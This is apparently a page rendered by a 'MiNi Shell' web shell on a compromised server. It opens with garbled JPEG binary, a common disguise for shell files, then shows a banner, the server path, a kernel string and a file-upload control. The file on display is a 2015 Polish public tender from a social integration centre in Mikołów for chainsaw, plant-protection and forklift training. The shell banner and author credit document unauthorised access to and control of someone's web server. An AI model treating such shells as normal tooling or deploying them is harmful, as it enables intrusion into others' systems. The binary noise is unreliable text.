JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150306/49440-N-2015.html

<p class="kh_header"><b>Mikołów: Prowadzenie szkoleń dla uczestników  Centrum Integracji Społecznej w Mikołowie</b><br>
<b>Numer ogłoszenia: 49440 - 2015; data zamieszczenia: 06.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Integracji Społecznej , U. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 738 11 45, faks 32 738 11 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Centrum Integracji Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie szkoleń dla uczestników  Centrum Integracji Społecznej w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prowadzenie szkoleń dla uczestników  Centrum Integracji Społecznej w Mikołowie w ramach projektu SZANSA-Punkt Konsultacyjny oraz wsparcie w Centrum Integracji Społecznej w Mikołowie 

Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń współfinansowanych ze środków Europejskiego Funduszu Społecznego, na rzecz uczestników/uczestniczek projektu SZANSA-Punkt Konsultacyjny oraz wsparcie w Centrum Integracji Społecznej w Mikołowie.

Zamawiający dopuszcza składanie ofert częściowych na poszczególne niżej wymienione części:

1.	Kurs drwala pilarza wraz z obsługą sprzętu ogrodniczego
a)	Ilość osób do przeszkolenia - 1
b)	Termin realizacji szkolenia: od dnia zawarcia umowy do  30.04.2015r. 
c)	Ilość godzin kursu (jednej osoby) - nie mniej niż 110 godzin ( w tym nie mniej niż 80 godzin zajęć praktycznych 
d)	Zakres kursu powinien obejmować co najmniej następujące zagadnienia: 
- zasady bezpieczeństwa i higieny pracy pilarką spalinową,
- paliwa, oleje i smary używane w eksploatacji pilarki,
- budowa pilarki, przygotowanie do pracy oraz utrzymanie odpowiedniego stanu technicznego,
- narzędzia i sprzęt pomocniczy do pozyskania drewna,
- techniki ścinki i obalania drzew normalnych i tzw. trudnych,
- okrzesywanie drzew ściętych,
- przerzynka drewna,
- zasady organizacji procesu pozyskania drewna.

Wykonawca zapewni  uczestnikom odpowiednie badania lekarskie dopuszczające  do pracy w zawodzie drwal-operator pilarki.  Kurs powinien być zakończony egzaminem teoretycznym i praktycznym oraz wydaniem zaświadczenia o ukończenia kursu uprawniające do podjęcia zawodu drwala-operatora pilarza.

2.	Kurs z zakresu stosowania środków ochrony roślin
a)	Ilość osób do przeszkolenia - 6
b)	Termin realizacji szkolenia:  od dnia zawarcia umowy do  30.04.2015r. 
c)	Ilość godzin szkolenia (jednej osoby) - nie mniej niż 14 godzin 
d)	Zakres szkolenia powinien obejmować: zagadnienia z zakresu bezpiecznego stosowania środków ochrony roślin przy użyciu opryskiwaczy. 
Szkolenie powinno się zakończyć egzaminem testowym. Po pomyślnym zaliczeniu testu Uczestnicy otrzymują ZAŚWIADCZENIE O UKOŃCZENIU SZKOLENIA W ZAKRESIE OCHRONY ROŚLIN  ważne przez 5 lat.
3.	Szkolenie Obsługa wózków widłowych wraz z wymianą butli gazowych
a)	Ilość osób do przeszkolenia - 3
b)	Termin realizacji szkolenia: od dnia zawarcia umowy do  30.04.2015r. 
c)	Ilość godzin szkolenia (jednej osoby) - nie mniej niż 67 godzin ( w tym nie mniej niż 15 godzin zajęć praktycznych nauki jazdy oraz nie mniej niż 6 godzin wymiany butli gazowych)
d)	Zakres szkolenia powinien obejmować co najmniej następujące zagadnienia:
- typy wózków jezdniowych,
- budowa wózków,
- czynności operatora przy obsłudze wózka (przed i po pracy),
- czynności operatora w czasie pracy z wózkami,
- wiadomości z zakresu ładunkoznawstwa,
- wiadomości z zakresu bhp,
- wiadomości o dozorze technicznym dotyczącym wózków,
- praktyczna nauka jazdy i manewrowania osprzętem wózków,
- przygotowanie kierowcy do wykonania czynności związanych z wymianą butli,
- pokaz przez instruktora sposobu wymiany butli próba wykonania wymiany butli przez kierowcę wózka,
- samodzielna wymiana butli pod nadzorem instruktora, 
Wykonawca zapewni egzamin umożliwiający każdemu z uczestników szkolenia uzyskanie zaświadczenia kwalifikacyjnego UDT do obsługi urządzeń transportu bliskiego i świadectwa kwalifikacyjnego uprawniającego do wymiany butli gazowych w wózkach jezdniowych (egzamin odbędzie się ostatniego dnia szkolenia).

Obowiązki Wykonawcy: 
1.	Wykonywanie czynności będących przedmiotem umowy z należytą starannością i czuwanie nad prawidłową realizacją zawartej umowy.
2.	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
3.	Prowadzenie dokumentacji w zakresie ww. działania:
a)	listy obecności uczestników szkolenia,
b)	dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
c)	oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych,
d)	rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia.
4.	Współpraca z koordynatorem projektu i z innymi pracownikami zatrudnionymi w projekcie.
5.	Uzyskanie niezbędnych zezwoleń oraz ubezpieczenia uczestników (od następstw nieszczęśliwych wypadków).
6.	Skierowanie na badania lekarskie niezbędne dla wykonywania czynności objętych zakresem szkolenia .
7.	Zapewnienie uczestnikom:
warunków w oparciu o zasady BHP, sale dydaktyczne powinny być wyposażone stosownie do potrzeb grupy słuchaczy, tj. w miejsca siedzące, ławki/stoliki, sprzęt audiowizualny, tablice szkolne i magnetyczne,
niezbędnych materiałów, narzędzi, maszyn i produktów koniecznych do prawidłowego przeprowadzenia kursów, 
materiałów dydaktycznych i biurowych koniecznych do przeprowadzenia zajęć - odbiór materiałów dydaktycznych i biurowych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia.
8.	Przygotowywania po zakończonym kursie protokołu odbioru wykonywanej pracy.
9.	Wykonawca, pod rygorem utraty prawa do zapłaty za szkolenie, zobowiązany jest do niezwłocznego poinformowania Zamawiającego o:
- niezgłoszeniu się uczestników na szkolenie,
- przerwaniu szkolenia lub rezygnacji z uczestnictwa oraz każdorazowej nieobecności uczestników,
- innych sytuacjach, które mają wpływ na realizację programu szkolenia  i umowy.
Warunki przeprowadzenia kursów:
1.	Kursy i zajęcia praktyczne powinny być przeprowadzone w obiekcie szkoleniowym przystosowanym do prowadzenia zajęć nie dalej niż 20 km od siedziby Zamawiającego.
2.	Kursy będą realizowane zgodnie z harmonogramem uzgodnionym z koordynatorem projektu. Wszelkie zmiany w harmonogramie wymagają akceptacji Zamawiającego. Dopuszcza się w uzasadnionych przypadkach przeprowadzenie kursów również w soboty i niedziele. 
3.	Zamawiający zastrzega możliwość zmniejszenia ilości kierowanych osób. Przy rozliczaniu Zamawiający zapłaci za faktyczną ilość przeszkolonych osób, a przypadku skreślenia z listy uczestników projektu w trakcie trwania umowy, Zamawiający zapłaci za szkolenie tej osoby, proporcjonalnie do ilości wykonanych godzin.
4.	Zamawiający  dopuszcza  możliwość  dołączenia  uczestników  kursów  do  grupy kursantów realizujących kurs tożsamy z przedmiotem zamówienia.
5.	Godzina zajęć teoretycznych liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut - długość przerw jest ustalana w sposób elastyczny przez Wykonawcę.
6.	Zamawiający dopuszcza, że czas trwania egzaminu będzie wliczony do czasu trwania kursu.
7.	Zajęcia będą się odbywać w dni powszednie od poniedziałku do piątku (z wyłączeniem świąt), 
w przedziale czasowym od 8:00 do 18:00 z zastrzeżeniem, że liczba godzin zajęć w ciągu jednego dnia nie przekroczy ośmiu. 
8.	Lokal, w którym będą przeprowadzone zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt dostosowane do prowadzenia szkoleń będących przedmiotem zamówienia.
9.	Każdy z uczestników kursów powinien mieć zapewnione samodzielne i odpowiednio (w sposób adekwatny do zakresu kursu) wyposażone stanowisko do nauki.
10.	Zajęcia praktyczne zostaną przeprowadzone w miejscach odpowiednio przystosowanych do przeprowadzenia kursów. Zamawiający dopuszcza możliwość przeprowadzenia zajęć w innym miejscu niż wskazane powyżej w takiej sytuacji Wykonawca zapewnia uczestnikom przewóz do miejsca odbywania zajęć i z powrotem na własny koszt, opiekę w trakcie dowożenia i odwożenia, przy czym godziny przyjazdu i odjazdu spod siedziby szkoły muszą być ustalone w taki sposób, aby umożliwić każdemu uczestnikowi dojazd i powrót do miejsca zamieszkania publicznymi środkami transportu. Transport ma się odbywać pojazdami dopuszczonymi do przewozu osób zgodnie z obowiązującymi przepisami prawa.
11.	Do przeprowadzenia zajęć praktycznych Wykonawca zapewni odpowiednią ilość niezbędnego sprzętu umożliwiając każdemu uczestnikowi kursów swobodne wykonywanie zajęć praktycznych.
12.	Wykonawca zobowiązany jest zapewnić warunki kursów zgodne z przepisami bezpieczeństwa
 i higieny pracy, w trakcie ich trwania z zachowaniem przepisów dotyczących ochrony środowiska, w tym -odpowiednio do kursu- wyposażenie każdego uczestnika szkolenia w odzież ochronną. Zamawiający nie wymaga przekazania uczestnikom kursu odzieży ochronnej na własność, a jedynie jej udostępnienia.
13.	Wykonawca zapewni dla potrzeb realizacji zajęć odpowiednio wykwalifikowany personel oraz odpowiedni, adekwatny do przedmiotu kursu, potencjał techniczny.
14.	W trakcie kursów Wykonawca powinien zapewnić uczestnikom na własność materiały szkoleniowe (tj. podręczniki lub skrypty zgodne z tematyką kursu, teczki, płyty CD z materiałami ćwiczeniowymi, notesy, długopisy, ołówki, zeszyty itp.). Wymienione powyżej materiały każdy uczestnik kursu otrzyma na własność. Materiały te muszą być oznakowane zgodnie z Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Wszystkie te materiały  muszą być przygotowane i rozdane uczestnikom kursu najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Oryginał pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu kursów razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
15.	Rozpoczęcie kursów zostanie poprzedzone pisemnym przesłaniem przez Zamawiającego listy uczestników kursów wraz z nazwą danego kursu.
16.	Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników kursu - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu.
17.	Kurs zakończy się oceną nabytych umiejętności w formie ankiety. Po zakończeniu kursu uczestnikom powinny zostać wydane zaświadczenia potwierdzające nabyte uprawnienia. Ponadto wydane certyfikaty, dyplomy lub zaświadczenia winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS.
18.	Każdy z kursów powinien mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację kursu, wskazaną do kontaktu z uczestnikami kursu oraz z Zamawiającym.
19.	Wykonawca zobowiązany jest do prowadzenia dokumentacji kursu tj. zdjęć zamieszczonych na płycie CD, dziennika zajęć, list obecności, ankiety oceniającej kurs oraz potwierdzenia odbioru przez uczestnika materiałów szkoleniowych oraz wydania zaświadczenia o ukończeniu kursu. Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 7 dni od dnia zakończenia zajęć, powyższych dokumentów niezbędnych do rozliczenia usługi. Dokumentacja ta winna być sporządzona według zaleceń Zamawiającego, tzn. Wykonawca zobowiązany jest umieszczać informacje o realizowaniu kursu finansowanego z funduszy europejskich na wszystkich dokumentach związanych z jego realizacją oraz w ten sam sposób oznakować miejsce prowadzenia zajęć.
20.	Wykonawca zobowiązany będzie do przestrzegania przepisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (Dz.U. z 2002 r. Nr 101 poz. 926, z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych  osobowych osób skierowanych na szkolenie.
21.	Zajęcia muszą być realizowane zgodnie z określonymi minimalnymi zakresami szkoleń. Program musi zawierać wszystkie elementy wynikające z § 75 ust. 4 Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.) to jest:
a)	nazwę i zakres kursu,
b)	czas trwania i sposób organizacji kursu,
c)	wymagania wstępne dla uczestników kursu,
d)	cele kursu,
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
f)	opis treści kursu w zakresie poszczególnych zajęć edukacyjnych,
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h)	przewidziane sprawdziany i egzaminy; 
22.	Wykonawca jest zobowiązany do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie się ceny ofertowy oraz z warunkami wykonania zamówienia.
23.	Wszystkie obowiązki i czynności wynikające z zakresu zamówienia Wykonawca zapewni na swój koszt i w swoim zakresie.
24.	Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców na równi              z pracami wykonanymi samodzielnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.53.12.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie powinni posiadać wpis do rejestru instytucji szkoleniowych zgodnie z art. 20 ust. 1 Ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 roku Nr 69, poz. 415, z późn. zm. ) oraz posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oraz posiadać ukończone szkolenie lub wykształcenie w zakresie, którego dotyczy szkolenie o którego prowadzenie ubiega się Wykonawca.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować obiektem szkoleniowym przystosowanym do prowadzenia zajęć teoretycznych i praktycznych nie dalej niż 20 km od siedziby Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje co najmniej 1 osobą przewidzianą do prowadzenia danego szkolenia (wykazanych w zał.  6  do SIWZ) mającą co najmniej sześciomiesięczne doświadczenie  w  prowadzeniu szkolenia o które ubiega się</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument stwierdzający iż Wykonawca dysponuje obiektem szkoleniowym przystosowanym do prowadzenia zajęć teoretycznych i praktycznych nie dalej niż 20 km od siedziby Zamawiającego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Potencjał kadrowy - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Integracji Społecznej 
w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 14:00, miejsce: Centrum Integracji Społecznej 
w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki
Priorytet VII Promocja integracji społecznej, 
Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com